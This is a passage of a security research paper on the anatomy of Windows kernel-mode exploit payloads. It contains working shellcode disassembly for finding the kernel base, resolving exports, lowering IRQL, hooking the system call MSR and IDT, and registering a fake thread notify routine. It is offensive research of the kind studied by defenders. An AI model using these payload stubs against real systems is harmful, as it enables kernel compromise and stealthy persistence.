Zines/uninformed/3.2.txt

Windows Kernel-mode Payload Fundamentals
bugcheck & skape
Dec 12, 2005

1) Foreword


Abstract: This paper discusses the theoretical and practical
implementations of kernel-mode payloads on Windows.  At the time of this
writing, kernel-mode research is generally regarded as the realm of a
few, but it is hoped that documents such as this one will encourage a
thoughtful progression of the subject matter.  To that point, this paper
will describe some of the general techniques and algorithms that may be
useful when implementing kernel-mode payloads. Furthermore, the anatomy
of a kernel-mode payload will be broken down into four distinct units,
known as payload components, and explained in detail.  In the end, the
reader should walk away with a concrete understanding of the way in
which kernel-mode payloads operate on Windows.

Thanks: The authors would like to thank Barnaby Jack and Derek Soeder
from eEye for their great paper on ring 0 payloads.  Thanks also go out
to jt, spoonm, vax, and everyone at nologin.

Disclaimer: The subject matter discussed in this document is presented
in the interest of education.  The authors cannot be held responsible
for how the information is used.  While the authors have tried to be as
thorough as possible in their analysis, it is possible that they have
made one or more mistakes.  If a mistake is observed, please contact one
or both of the authors so that it can be corrected.

Notes: In most cases, testing was performed on Windows 2000 SP4 and
Windows XP SP0.  Compatibility with other operating system versions,
such as XP SP2, was inferred by analyzing structure offsets and
disassemblies.  It is theorized that many of the implementations
described in this document are also compatible with Windows 2003 Server
SP0/SP1, but due to lack of a functional 2003 installation, testing
could not be performed.

2) Introduction


The subject of exploiting user-mode vulnerabilities and the payloads
required to take advantage of them is something that has been discussed
at length over the course of the past few years.  With this realization
finally starting to set in, security vendors have begun implementing
security products that are designed to prevent the exploitation of
user-mode vulnerabilities through a number of different techniques.
There is a shift afoot, however, and it has to do with attacker focus
being shifted from user-mode vulnerabilities toward the realm of
kernel-mode vulnerabilities.  The reasons for this shift are due in part
to the inherent value of a kernel-mode vulnerability and to the
relatively unexplored nature of kernel-mode vulnerabilities, which is
something that most researchers find hard to resist.

To help aide in the shift from user-mode to kernel-mode, this paper will
explore and extend the topic of kernel-mode payloads on Windows.  The
reason that kernel-mode payloads are important is because they are the
method of actually doing something meaningful with a kernel-mode
vulnerability. Without a payload, the ability to control code execution
means nothing more than having the ability to cause a denial of service.
Barnaby Jack and Derek Soeder from eEye have done a great job in kicking
off the public research into this area.

Just like user-mode payloads on Windows, kernel-mode payloads can be
broken down into general techniques and algorithms that are applicable
to most payloads.  These techniques and algorithms will be discussed in
chapter .  Furthermore, both user-mode and kernel-mode payloads can be
broken down into a set of payload components that can be combined
together to form a single logical payload.  A payload component is
simply defined as an autonomous unit of a payload that has a specific
purpose.  For instance, both user-mode and kernel-mode payloads have an
optional component called a stager that can be used to execute a second
logical payload component known as a stage.  One major distinction
between kernel-mode and user-mode payloads, however, is that kernel-mode
payloads are burdened with some extra considerations that are not found
in user-mode payloads, and for that reason are broken down into a few
more distinct payload components.  These extra components will be
discussed at length in chapter .

The purpose of this document is to provide the reader with a point of
reference for the major aspects common to most all kernel-mode payloads.
To simplify terminology, kernel-mode payloads will be referred to
throughout the document as R0 payloads, short for ring 0, which
symbolizes the processor ring that kernel-mode operates at on x86. For
the same reason, user-mode payloads will be referred to throughout the
document as R3 payloads, short for ring 3.  To fully understand this
paper, the reader should have a basic understanding of Windows
kernel-mode programming.

In order to limit the scope of this document, the methods that can be
used to achieve code execution through different vulnerability scenarios
will not be discussed at length.  The main reason for this is that
general approaches to payload implementation are typically independent
of the vulnerability in which they are used for.  However, references to
some of the research in this area can be found in the bibliography for
readers who might be curious.  Furthermore, this document will not
expand upon some of the interesting things that can be done in the
context of a kernel-mode payload, such as keyboard sniffing.  Instead,
the topic of advanced kernel-mode payloads will be left for future
research.  The authors hope that by describing the various elements that
will compose most all kernel-mode payloads, the process involved in
implementing some of the more interesting parts will be made easier.

With all of the formalities out of the way, the first leap to take is
one regarding an understanding of some of the general techniques that
can be applied to kernel-mode payloads, and it's there that the journey
begins.

3) General Techniques


This chapter will outline some of the techniques and algorithms that are
generally applicable to most kernel-mode payloads.  For example,
kernel-mode payloads may find it necessary to resolve certain exported
symbols for use within the payload itself, much the same as user-mode
payloads find it necessary.

3.1) Finding Ntoskrnl.exe Base Address


One of the pre-requisites to nearly all user-mode payloads on Windows is
a stub that is responsible for locating the base address of
kernel32.dll.  In kernel-mode, the logical equivalent to kernel32.dll is
ntoskrnl.exe, also known more succinctly as nt.  The purpose of nt is to
implement the heart of the kernel itself and to provide the core library
interface to device drivers.  For that reason, a lot of the routines
that are exported by nt may be of use to kernel-mode payloads.  This
makes locating the base address of nt important because it is what
facilitates the resolving of exported symbols.  This section will
describe a few techniques that can be used to locate the base address of
nt.

One general technique that is taken to find the base address of nt is to
reliably locate a pointer that exists somewhere within the memory
mapping for nt and to scan down toward lower addresses until the MZ
checksum is found.  This technique will be referred to as a scandown
technique since it involves scanning downward toward lower addresses.
This is completely synonymous with the mid-delta term used by eEye, but
just clarified to indicate a direction. In the implementations provided
below, each makes use of an optimization to walk down in PAGESIZE
decrements. However, this also adds four bytes to the amount of space
taken up by the stub.  If size is a concern, walking down byte-by-byte
as is done in the eEye paper can be a great way to save space.

Another thing to keep in mind with some of these implementations is that
they may fail if the /3GB boot flag is specified. This is not generally
very common, but it could be something that is encountered in the real
world.

3.1.1) IDT Scandown

  +---------+----------+
  | Size:   | 17 bytes |
  | Compat: | All      |
  | Credit: | eEye     |
  +---------+----------+

The approach for finding the base address of nt discussed in eEye's
paper involved finding the high-order word of an IDT handler that was
set to a symbol somewhere inside nt. After acquiring the symbol address,
the payload simply walked down toward lower addresses in memory
byte-by-byte until it found the MZ checksum.  The following disassembly
shows the approach taken to do this:


00000000  8B3538F0DFFF      mov esi,[0xffdff038]
00000006  AD                lodsd
00000007  AD                lodsd
00000008  48                dec eax
00000009  81384D5A9000      cmp dword [eax],0x905a4d
0000000F  75F7              jnz 0x8


This approach is perfectly fine, however, it could be prone to error
if the four checksum bytes were found somewhere within nt which did not
actually coincide with its base address.  This issue is one that is
present to any scandown technique (referred to as ``mid-deltas'' by
eEye).  However, scanning down byte-by-byte can be seen as potentially
more error prone, but this is purely conjecture at this point as the
authors are aware of no specific cases in which it would fail. It may
also fail if the direction flag is not cleared, though the chances of
this happening are minimal. One other limiting factor may be the
presence of the NULL byte in the comparison.  It is possible to slightly
improve (depending upon which perspective one is looking at it from)
this approach by scanning downward one page at a time and by eliminating
the need to clear the direction flag It is not possible walk downward in
16-page decrements due to the fact that 16 page alignment is not
guaranteed universally in kernel-mode. This also eliminates the presence
of NULL bytes. However, some of these changes lead to the code being
slightly larger (20 bytes total):


00000000  6A38              push byte +0x38
00000002  5B                pop ebx
00000003  648B03            mov eax,[fs:ebx]
00000006  8B4004            mov eax,[eax+0x4]
00000009  662501F0          and ax,0xf001
0000000D  48                dec eax
0000000E  6681384D5A        cmp word [eax],0x5a4d
00000013  75F4              jnz 0x9


3.1.2) KPRCB IdleThread Scandown

  +---------+----------+
  | Size:   | 17 bytes |
  | Compat: | All      |
  +---------+----------+

The base address of nt can also be found by looking at the IdleThread
attribute of the KPRCB for the current KPCR.  As it stands, this
attribute always appears to point to a global variable inside of nt.
Just like the IDT scandown approach, this technique uses the symbol as a
starting point to walk down and find the base address of nt by looking
for the MZ checksum.  The following disassembly shows how this is
accomplished:


00000000  A12CF1DFFF        mov eax,[0xffdff12c]
00000005  662501F0          and ax,0xf001
00000009  48                dec eax
0000000A  6681384D5A        cmp word [eax],0x5a4d
0000000F  75F4              jnz 0x5


This approach will fail if it happens that the IdleThread attribute does
not point somewhere within nt, but thus far a scenario such as this has
not been observed.  It would also fail if the Kprcb attribute was not
found immediately after the Kpcr, but this has not been observed in
testing.

3.1.3) SYSENTER_EIP_MSR Scandown


  +---------+------------------------------------+
  | Size:   | 19 bytes                           |
  | Compat: | XP, 2003 (modern processors only)  |
  +---------+------------------------------------+

For processors that support the system call MSR 0x176
(SYSENTER_EIP_MSR), the base address of nt can be found by reading the
registered system call handler and then using the scandown technique to
find the base address.  The following disassembly illustrates how this
can be accomplished:


00000000  6A76              push byte +0x76
00000002  59                pop ecx
00000003  FEC5              inc ch
00000005  0F32              rdmsr
00000007  662501F0          and ax,0xf001
0000000B  48                dec eax
0000000C  6681384D5A        cmp word [eax],0x5a4d
00000011  75F4              jnz 0x7


3.1.4) Known Portable Base Scandown

  +---------+--------------------+
  | Size:   | 17 bytes           |
  | Compat: | 2000, XP, 2003 SP0 |
  +---------+--------------------+

A quick sampling of base addresses across different major releases show
that the base address of nt is always within a certain range.  The one
exception to this in the polling was Windows 2003 Server SP1, and for
that reason this payload is not compatible.  The basic idea is to simply
use an offset that is known to reside within the region that nt will be
mapped at on different operating system versions.  The table below
describes the mapping ranges for nt on a few different samplings:


  +------------------+--------------+-------------+
  | Platform         | Base Address | End Address |
  +------------------+--------------+-------------+
  | Windows 2000 SP4 | 0x80400000   | 0x805a3a00  |
  | Windows XP SP0   | 0x804d0000   | 0x806b3f00  |
  | Windows XP SP2   | 0x804d7000   | 0x806eb780  |
  | Windows 2003 SP1 | 0x80800000   | 0x80a6b000  |
  +------------------+--------------+-------------+


As can be seen from the table, the address 0x8050babe resides within
every region that nt could be mapped at except for Windows 2003 Server
SP1.  The payload below implements this approach:


00000000  B8BEBA5080        mov eax,0x8050babe
00000005  662501F0          and ax,0xf001
00000009  48                dec eax
0000000A  6681384D5A        cmp word [eax],0x5a4d
0000000F  75F4              jnz 0x5


3.2) Resolving Symbols

  +---------+----------+
  | Size:   | 67 bytes |
  | Compat: | All      |
  +---------+----------+


Another aspect common to almost all payloads on Windows is the use of
code that walks the export directory of an image to resolve the address
of a symbol The technique of walking the export directory to resolve
symbols has been used for ages, so don't take the example here to be the
first ever use of it. In the kernel, things aren't much different.
Barnaby refers to the use of a two-byte XOR/ROR hash in the eEye paper.
Alternatively, a four byte hash could be used, but as pointed out in the
eEye paper, this leads to a waste of space when two-byte hash could
suffice equally well provided there are no collisions.

The approach implemented below involves passing a two-byte hash in the
ebx register (the high order bytes do not matter) and the base address
of the image to resolve against in the ebp register.  In order to save
space, the code below is designed in such a way that it will transfer
execution into the function after it resolves it, thus making it
possible to resolve and call the function in one step without having to
cache addresses.  In most cases, this leads to a size efficiency
increase.


00000000  60                pusha
00000001  31C9              xor ecx,ecx
00000003  8B7D3C            mov edi,[ebp+0x3c]
00000006  8B7C3D78          mov edi,[ebp+edi+0x78]
0000000A  01EF              add edi,ebp
0000000C  8B5720            mov edx,[edi+0x20]
0000000F  01EA              add edx,ebp
00000011  8B348A            mov esi,[edx+ecx*4]
00000014  01EE              add esi,ebp
00000016  31C0              xor eax,eax
00000018  99                cdq
00000019  AC                lodsb
0000001A  C1CA0D            ror edx,0xd
0000001D  01C2              add edx,eax
0000001F  84C0              test al,al
00000021  75F6              jnz 0x19
00000023  41                inc ecx
00000024  6639DA            cmp dx,bx
00000027  75E3              jnz 0xc
00000029  49                dec ecx
0000002A  8B5F24            mov ebx,[edi+0x24]
0000002D  01EB              add ebx,ebp
0000002F  668B0C4B          mov cx,[ebx+ecx*2]
00000033  8B5F1C            mov ebx,[edi+0x1c]
00000036  01EB              add ebx,ebp
00000038  8B048B            mov eax,[ebx+ecx*4]
0000003B  01E8              add eax,ebp
0000003D  8944241C          mov [esp+0x1c],eax
00000041  61                popa
00000042  FFE0              jmp eax


To understand how this function works, take for example the resolution
of nt!ExAllocatePool.  First, a hash of the string ``ExAllocatePool''
must be obtained using the same algorithm that the payload uses.  For
this payload, the result is 0x0311b83f This was calculated by doing perl
-Ilib -MPex::Utils -e "printf .8x,
Pex::Utils::Ror(Pex::Utils::RorHash("ExAllocatePool"), 13);".  Since the
implementation uses a two-byte hash, only 0xb83f is needed. This hash is
then stored in the bx register.  Since ExAllocatePool is found within
nt, the base address of nt must be passed in the ebp register.  Finally,
in order to perform the resolution, the arguments to nt!ExAllocatePool
must be pushed onto the stack prior to calling the resolution routine.
This is because the resolution routine will transfer control into
nt!ExAllocatePool after the resolution succeeds and therefore must have
the proper arguments on the stack.

One downside to this implementation is that it won't support the
resolution of data exports (since it tries to jump into them).  However,
for such a purpose, the routine could be modified to simply not issue
the jmp instruction and instead rely on the caller to execute it.  It is
also important for payloads that use this resolution technique to clear
the direction flag with cld.

4) Payload Components


This chapter will outline four distinct components that can be used in
conjunction with one another to produce a logical kernel-mode payload.
Unlike user-mode vulnerabilities, kernel-mode vulnerabilities tend to be
a bit more involved when it comes to considerations that must be made
when attempting to execute code after successfully exploiting a target.
These concerns include things like IRQL considerations, setting up code
for execution, gracefully continuing execution, and what action to
actually perform. Some of these steps have parallels to user-mode
payloads, but others do not.

The first consideration that must be made when implementing a
kernel-mode payload is whether or not the IRQL that the payload will be
running at is a concern.  For instance, if the payload will be making
use of functions that require the processor to be running at
PASSIVE_LEVEL, then it may be necessary to ensure that the processor is
transitioned to a safe IRQL.  This consideration is also dependent on
the vulnerability in question as to whether or not the IRQL will even be
a problem.  For scenarios where it is a problem, a migration payload
component can be used to ensure that the code that requires a specific
IRQL is executed in a safe manner.

The second consideration involves staging either a R3 payload (or
secondary R0 payload) to another location for execution.  This payload
component is encapsulated by a stager which has parallels to payload
stagers found in typical user-mode payloads.  Unlike user-mode payloads,
though, kernel-mode stagers are typically designed to execute code in
another context, such as in a user-mode process or in another
kernel-mode thread context.  As such, stagers may sometimes overlap with
the purpose of the migration component, such as when the act of staging
leads to the stage executing at a safe IRQL, and can therefore be
considered a superset of a migration component in that case.

The third consideration has to do with how the payload gracefully
restores execution after it has completed.  This portion of a
kernel-mode payload is classified as the recovery component.  In short,
the recovery component of a payload finds a way to make sure that the
kernel does not crash or otherwise become unusable.  If the kernel were
to crash, any code that the payload had intended to execute may not
actually get a chance to run depending on how the payload is structured.
As such, recovery is one of the most volatile and critical aspects of a
kernel-mode payload.

Finally, and most importantly, the fourth component of a kernel-mode
payload is the stage component.  It is this component that actually
performs the real work of the payload.  For instance, a stage component
might detect that it's running in the context of lsass.exe and create a
reverse shell in user-mode.  As another example of a stage component,
eEye demonstrated a keyboard hook that sent keystrokes back in ICMP echo
responses from the host.  Stages have a very broad definition.

The following sections will explain each one of the four payload
components in detail and offer techniques and implementations that can
be used under certain situations.

4.1) Migration


One of the things that is different about kernel-mode vulnerabilities in
relation to user-mode vulnerabilities is that the Windows kernel
operates internally at specific Interrupt Request Levels, also known as
IRQLs.  The purpose of IRQLs are to allow the kernel to mask off
interrupts that occur at a lower level than the one that the processor
is currently executing at.  This ensures that a piece of code will run
un-interrupted by threads and hardware/software interrupts that have a
lesser priority.  It also allows the kernel to define a driver model
that ensures that certain operations are not performed at critical
processor IRQLs. For instance, it is not permitted to block at any IRQL
greater than or equal to DISPATCH_LEVEL.  It is also not permitted to
reference pageable memory that has been paged out at greater than or
equal to DISPATCH_LEVEL.

The reason this is important is because the IRQL that the processor will
be running at when a kernel-mode vulnerability is triggered is highly
dependent upon the area in which the vulnerability occurs.  For this
reason, it may be generally necessary to have an approach for either
directly or indirectly lowering the IRQL in such a way that permits the
use of some of the common driver support routines.  As an example, it is
not possible to call nt!KeInsertQueueApc at an IRQL greater than
PASSIVE_LEVEL.

This section will focus on describing methods that could be used to
implement migration payloads.  The purpose of a migration payload is to
migrate the processor to an IRQL that will allow payloads to make use of
pageable memory and common driver support routines as described above.
The techniques that can be used to do this vary in terms of stability
and simplicity.  It's generally a matter of picking the right one for
the job.

4.1.1) Direct IRQL Adjustment


  +---------+------------------+
  | Type:   | R0 IRQL Migrator |
  | Size:   | 6 bytes          |
  | Compat: | All              |
  +---------+------------------+


One of the most straight-forward approaches that can be taken to migrate
a payload to a safe IRQL is to directly lower a processor's IRQL. This
approach was first proposed by eEye and involved resolving and calling
hal!KeLowerIrql with the desired IRQL, such as PASSIVE_LEVEL.  This
technique is very dangerous due to the way in which IRQLs are intended
to be used.  The direct lowering of an IRQL can lead to machine
deadlocks and crashes due to unsafe assumptions about locks being held,
among other things.

An optimization to the hal!KeLowerIrql technique is to perform the
operation that hal!KeLowerIrql actually performs. Specifically,
hal!KeLowerIrql is a simple wrapper for hal!KfLowerIrql which adjusts
the Irql attribute of the KPCR structure for a specific processor to the
supplied IRQL (as well as calling software interrupt handlers for masked
IRQLs). To implement a payload that migrates to a safe IRQL, all that is
required is to adjust the value at fs:0x24, such as by lowering it to
PASSIVE_LEVEL as shown below In kernel-mode, the fs segment points to the
current processor's KPCR structure.


00000000  31C0              xor eax,eax
00000002  64894024          mov [fs:eax+0x24],eax


One concern about taking this approach over calling hal!KeLowerIrql is
that the soft-interrupt handlers associated with interrupts that were
masked while at a raised IRQL will not be called.  It is unclear whether
or not this could lead to a deadlock, but is theorized that the answer
could be yes.  However, the authors did test writing a driver that
raised to HIGHLEVEL, spun for a period of time (during which kb/mouse
interrupts were sent), and then manually adjusted the IRQL as described
above.  There appeared to be no adverse side effects, but it has not
been ruled out that a deadlock could be possible Consequently, if anyone
knows a definitive answer to this, the authors would love to hear it.

Aside from the risks, this approach is nice because it is very small (6
bytes), so assuming there are no significant problems with it, then the
use of this method would be a no-brainer given the right set of
circumstances for a vulnerability.

4.1.2) System Call MSR/IDT Hooking


  +---------+------------------+
  | Type:   | R0 IRQL Migrator |
  | Size:   | 97 bytes         |
  | Compat: | All              |
  +---------+------------------+

One relatively simple way of migrating a R0 payload to a safe IRQL is by
hooking the function used to dispatch system calls in kernel-mode
through the use of a processor model-specific register.  In newer
processors, system calls are dispatched through an improved interface
that takes advantage of a registered function pointer that is given
control when a system call is dispatched.  The function pointer is
stored within the STAR model-specific register that has a symbolic code
of 0x176.

To take advantage of this on Windows XP+ for the purpose payload
migration, all that is required is to first read the current state of
the MSR so that the original system call dispatcher routine can be
preserved. After that, the second stage of the R0 payload must be copied
to another location, preferably globally accessible and unused, such as
SharedUserData or the KPRCB.  Once the second stage has been copied, the
value of the MSR can be changed to point to the first instruction of the
now-copied stage.  The end result is that whenever a system call is
dispatched from user-mode, second stage of the R0 payload will be
executed as IRQL = PASSIVE.

For Windows 2000, and for versions of Windows XP+ running on older
hardware, another approach is required that is virtually equivalent.
Instead of changing the processor MSR, the IDT entry for the 0x2e
soft-interrupt that is used to dispatch system calls must be hooked so
that whenever the soft-interrupt is triggered the migrated R0 payload is
called.  The steps taken to copy the second stage to another location
are the same as they would be under the MSR approach.

The following steps outline one way in which a stager of this type could
be implemented for Windows 2000 and Windows XP.

1. Determining which system call vector to hook.

By checking KUSER_SHARED_DATA.NtMinorVersion located at 0xffdf0270 for a
value of 0 it is safe to assume the IDT will need to be hooked since the
syscall/sysenter instructions are not used in Windows 2000, otherwise
the hook should be installed in the MSR:0x176 register. Note however
that it is possible Windows XP will not use this method under rare
circumstances. Also an assumption of NtMajorVersion being 5 is made.

2. Caching the existing service routine address

If the MSR register is to be hooked the current value can be retrieved
by placing the symbolic code of 0x176 in ecx and using the rdmsr
instruction.  The existing value will be returned in edx:eax. If the IDT
entry at index 0x2e is to be hooked it can be retrieved by first
obtaining the processors IDT base using the sidt instruction. The entry
then can be located at offset 0x170 relative to the base since the IDT
is an array of KIDTENTRY structures.  Lastly the address of the code
that services the interrupt is in KIDTENTRY with the low word at Offset
and high word at ExtendedOffset. The following is the definition of
KIDTENTRY.


DTENTRY
+0x000 Offset           : Uint2B
+0x002 Selector         : Uint2B
+0x004 Access           : Uint2B
+0x006 ExtendedOffset   : Uint2B


3. Migrating the payload

A relatively safe place to migrate the payload to is the free space
after the first processors KPCR structure. An arbitrary value of
0xffdffd80 is used to cache the current service routine address and the
remainder of the payload is copied to 0xffdffd84 followed by a an
indirect jump to the original service routine using jmp [0xffdffd80].
Note that a payload is responsible for maintaining all registers before
calling the original service routine with this implementation. The
payload also may not exceed the end of the memory page, thus limiting
its size to 630 bytes. Historically, R0 shellcode has been put in the
space after SharedUserData since it is exposed to all processes at R3.
However, that could have its disadvantages if the payload has no
requirements to be accessed from R3. The down side is the smaller amount
of free space available.

4. Hooking the service routine

Using the same methods described to cache the current service routine
are used to hook. For hooking the IDT, interrupts are temporarily
disabled to overwrite the KIDTENTRY Offset and ExtendedOffset fields.
Disabling interrupts on the current processor will still be safe in
multiprocessor environments since IDTs are maintained on a per processor
basis. For hooking the MSR, the new service routine is placed in edx:eax
(for this case 0x0:0xffdffd84), 0x176 in ecx, and issue a wrmsr
instruction.


The following code illustrates an implementation of this type of staging
payload. It's roughly 97 bytes in size, excluding the staged payload and
the recovery method. Removing the support for hooking the IDT entry
reduces the size to roughly 47 bytes.


00000000  FC                cld
00000001  BF80FDDFFF        mov edi,0xffdffd80
00000006  57                push edi
00000007  6A76              push byte +0x76
00000009  58                pop eax
0000000A  FEC4              inc ah
0000000C  99                cdq
0000000D  91                xchg eax,ecx
0000000E  89F8              mov eax,edi
00000010  66B87002          mov ax,0x270
00000014  3910              cmp [eax],edx
00000016  EB06              jmp short 0x1e
00000018  50                push eax
00000019  0F32              rdmsr
0000001B  AB                stosd
0000001C  EB3E              jmp short 0x5c
0000001E  648B4238          mov eax,[fs:edx+0x38]
00000022  8D4408FA          lea eax,[eax+ecx-0x6]
00000026  50                push eax
00000027  91                xchg eax,ecx
00000028  8B4104            mov eax,[ecx+0x4]
0000002B  668B01            mov ax,[ecx]
0000002E  AB                stosd
0000002F  EB2B              jmp short 0x5c
00000031  5E                pop esi
00000032  6A01              push byte +0x1
00000034  59                pop ecx
00000035  F3A5              rep movsd
00000037  B8FF2580FD        mov eax,0xfd8025ff
0000003C  AB                stosd
0000003D  66C707DFFF        mov word [edi],0xffdf
00000042  59                pop ecx
00000043  58                pop eax
00000044  0404              add al,0x4
00000046  85C9              test ecx,ecx
00000048  9C                pushf
00000049  FA                cli
0000004A  668901            mov [ecx],ax
0000004D  C1E810            shr eax,0x10
00000050  66894106          mov [ecx+0x6],ax
00000054  9D                popf
00000055  EB04              jmp short 0x5b
00000057  31D2              xor edx,edx
00000059  0F30              wrmsr
0000005B  C3                ret ; replace with recovery method
0000005C  E8D0FFFFFF        call 0x31

... R0 stage here ...

4.1.3) Thread Notify Routine


  +---------+------------------+
  | Type:   | R0 IRQL Migrator |
  | Size:   | 127 bytes        |
  | Compat: | 2000, XP         |
  +---------+------------------+


Another technique that can be used to migrate a payload to a safe IRQL
involves setting up a thread notify routine which is normally done by
calling nt!PsSetCreateThreadNotifyRoutine.  Unfortunately, the
documentation states that this routine can only be called at
PASSIVE_LEVEL, thus making it appear as if calling it from a payload
would lead to problems.  While this is true, it is also possible to
manually create a notify routine by modifying the global array of thread
notify routines.  Although this array is not exported, it is easy to
find by extracting an address reference to it from one of either
nt!PsSetCreateThreadNotifyRoutine or
nt!PsRemoveCreateThreadNotifyRoutine.  By using this basic approach, it
is possible to write a migration payload that transitions to
PASSIVE_LEVEL by registering a callback that is called whenever a thread
is created or deleted.

In more detail, a few steps must be taken in order to get this to work
properly on 2000 and XP.  The steps taken on 2003 should be pretty much
the same as XP, but have not been tested.

1. Find the base address of nt

The base address of nt must be located so that an exported symbol can be
resolved.

2. Determine the current operating system

Since the method used to install the thread notify routines differ
between 2000 and XP, a check must be made to see what operating system
the payload is currently running on.  This is done by checking the
NtMinorVersion attribute of KUSER_SHARED_DATA at 0xffdf0270.

3. Shift edi to point to the storage buffer

Due to the fact that it can't be generally assumed that the buffer the
payload is running from will stick around until the notify routine is
called, the stage associated with the payload must be copied to another
location.  In this case, the payload is copied to a buffer starting at
0xffdf04e0.

4. If the payload is running on XP

On XP, the technique used to register the thread notify routine requires
creating a callback structure in a global location and manually
inserting it into the nt!PspCreateThreadNotifyRoutine array.  This has
to be done in order to avoid IRQL issues.  For that reason, a fake
callback structure is created and is designed to be stored at
0xffdf04e0.  The actual code that will be executed will be copied to
0xffdf04e8.  The function pointer inside the callback structure is
located at offset 0x4, but in the interest of size, both of the first
attributes are initialized to point to 0xffdf04e8.

It is also important to note that on XP, the
nt!PspCreateThreadNotifyRoutineCount must be incremented so that the
notify routine will actually be called.  Fortunately, for versions of XP
currently tested, this value is located 0x20 bytes after the notify
routine array.

5. If the payload is running on 2000

On 2000, the nt!PspCreateThreadNotifyRoutine is just an array of
function pointers.  For that reason, registering the notify routine is
much simpler and can actually be done by calling
nt!PsSetCreateThreadNotifyRoutine without much of a concern since no
extra memory is allocated.  By calling the real exported routine
directly, it is not necessary to manually increment the
nt!PspCreateThreadNotifyRoutineCount.  Furthermore, doing so would not
be as easy as it is on XP because the count variable is located quite a
distance away from the array itself.

6. Resolve the exported symbol

The symbol resolution approach taken in this payload involves comparing
part of an exported symbol's name with ``dNot''.  This is done because
on XP, the actual symbol needed in order to extract the address of
nt!PspCreateThreadNotifyRoutine is found a few bytes into
nt!PsRemoveCreateThreadNotifyRoutine.  However, on 2000, the address of
nt!PsSetCreateThreadNotifyRoutine needs to be resolved as it is going to
be directly called.  As such, the offset into the string that is
compared between 2000 and XP differs.  For 2000, the offset is 0x10.
For XP, the offset is 0x13.  The end result of the resolution process is
that if the payload is running on XP, the eax register will hold the
address of nt!PsRemoveCreateThreadNotifyRoutine and if it's running on
2000 it will hold the address of nt!PsSetCreateThreadNotifyRoutine.

7. Copy the second stage payload

Once the symbol has been resolved, the second stage payload is copied to
the destination described in an earlier step.

8. Set up the notify routine entry

If the payload is running on XP, a fake callback structure is manually
inserted into the nt!PspCreateThreadNotifyRoutine array and the
nt!PspCreateThreadNotifyRoutineCount is manually incremented.  If the
payload is running on 2000, a direct call to
nt!PsSetCreateThreadNotifyRoutine is issued with the pointer to the
copied second stage as the notify routine to be registered.

A payload that implements the thread notify routine approach is
shown below:


00000000  FC                cld
00000001  A12CF1DFFF        mov eax,[0xffdff12c]
00000006  48                dec eax
00000007  6631C0            xor ax,ax
0000000A  6681384D5A        cmp word [eax],0x5a4d
0000000F  75F5              jnz 0x6
00000011  95                xchg eax,ebp
00000012  BF7002DFFF        mov edi,0xffdf0270
00000017  803F01            cmp byte [edi],0x1
0000001A  66D1C7            rol di,1
0000001D  57                push edi
0000001E  750E              jnz 0x2e
00000020  89F8              mov eax,edi
00000022  83C008            add eax,byte +0x8
00000025  AB                stosd
00000026  AB                stosd
00000027  57                push edi
00000028  6A06              push byte +0x6
0000002A  6A13              push byte +0x13
0000002C  EB05              jmp short 0x33
0000002E  57                push edi
0000002F  6A81              push byte -0x7f
00000031  6A10              push byte +0x10
00000033  5A                pop edx
00000034  31C9              xor ecx,ecx
00000036  8B7D3C            mov edi,[ebp+0x3c]
00000039  8B7C3D78          mov edi,[ebp+edi+0x78]
0000003D  01EF              add edi,ebp
0000003F  8B7720            mov esi,[edi+0x20]
00000042  01EE              add esi,ebp
00000044  AD                lodsd
00000045  41                inc ecx
00000046  01E8              add eax,ebp
00000048  813C10644E6F74    cmp dword [eax+edx],0x746f4e64
0000004F  75F3              jnz 0x44
00000051  49                dec ecx
00000052  8B5F24            mov ebx,[edi+0x24]
00000055  01EB              add ebx,ebp
00000057  668B0C4B          mov cx,[ebx+ecx*2]
0000005B  8B5F1C            mov ebx,[edi+0x1c]
0000005E  01EB              add ebx,ebp
00000060  8B048B            mov eax,[ebx+ecx*4]
00000063  01E8              add eax,ebp
00000065  59                pop ecx
00000066  85C9              test ecx,ecx
00000068  8B1C08            mov ebx,[eax+ecx]
0000006B  EB14              jmp short 0x81
0000006D  5E                pop esi
0000006E  5F                pop edi
0000006F  6A01              push byte +0x1
00000071  59                pop ecx
00000072  F3A5              rep movsd
00000074  7808              js 0x7e
00000076  5F                pop edi
00000077  893B              mov [ebx],edi
00000079  FF4320            inc dword [ebx+0x20]
0000007C  EB02              jmp short 0x80
0000007E  FFD0              call eax
00000080  C3                ret
00000081  E8E7FFFFFF        call 0x6d

... R0 stage here ...


The R0 stage must keep in mind that it will be called in the context
of a callback, so in order to ensure graceful recovery the stage must
issue a ret 0xc or equivalent instruction upon completion.  The R0 stage
must also be capable of being re-entered without having any adverse side
effects.  This approach may also be compatible with 2003, but tests were
not performed. This payload could be made significantly smaller if it
were targeted to a specific OS version.  One major benefit to this
approach is that the stage will be passed arguments that are very useful
for R3 code injection, such as a ProcessId and ThreadId.

This approach has quite a few cons.  First, the size of the payload
alone makes it less useful due to all the work required to just migrate
to a safe IRQL.  Furthermore, this payload also relies on offsets that
may be unreliable across new versions of the operating system,
specifically on XP.  It also depends on the pages that the notify
routine array resides at being paged in at the time of the registration.
If they are not, the payload will fail if it is running at a raised IRQL
that does not permit page faults.

4.1.4)  Hooking Object Type Initializer Procedures


One theoretical way that could be used to migrate to a safe IRQL would
be to hook into one of the generalized object type initializer
procedures associated with a specific object type, such as
nt!PsThreadType or nt!PsProcessType These procedures can be found in the
OBJECTTYPEINITIALIZER structure. The method taken to do this would be to
first resolve one of the exported object types and then alter one of the
procedure attributes, such as the OpenProcedure, to point into a buffer
that contains the payload to execute. The payload could then make a
determination on whether or not it's safe to execute based on the
current IRQL. It may also be safe, in some cases, to to assume that the
IRQL will be PASSIVE_LEVEL for a given object type procedure.  Matt
Conover also describes how this can be done in his Malware Profiling and
Rootkit Detection on Windows paper.  Thanks to Derek Soeder for
suggesting this approach.

4.1.5) Hooking KfRaiseIrql


This approach was suggested by Derek Soeder could be quite reliable as
an IRQL migration component.  The basic concept would be to resolve and
hook hal!KfRaiseIrql. Inside the hook routine, a check could be
performed to see if the current IRQL is passive and, if so, run the rest
of the payload. However, as Derek points out, one of the problems with
this approach would center around the method used to hook the function
considering it'd be somewhat expensive to do a detours-style preamble
hook (although it's fairly easy to disable write protection).  Still,
this approach shows a good line of thinking that could be used to get to
a safe IRQL.

4.2) Stagers


The stager payload component is designed to set up the execution of a
separate payload either at R0 or R3.  This payload component is pretty
much equivalent to the concept of stagers in user-mode payloads, but
instead of reading in a payload off the wire for execution, R0 stagers
typically have the staged payload tacked on to the stager already since
there is no elegant method of reading in a second stage from the network
without consuming a lot of space in the process.  This section will
describe some of the techniques that can be used to execute a stage at
either R0 or R3.  The techniques that are theoretical and do not have
proof of concept code will be described as such.

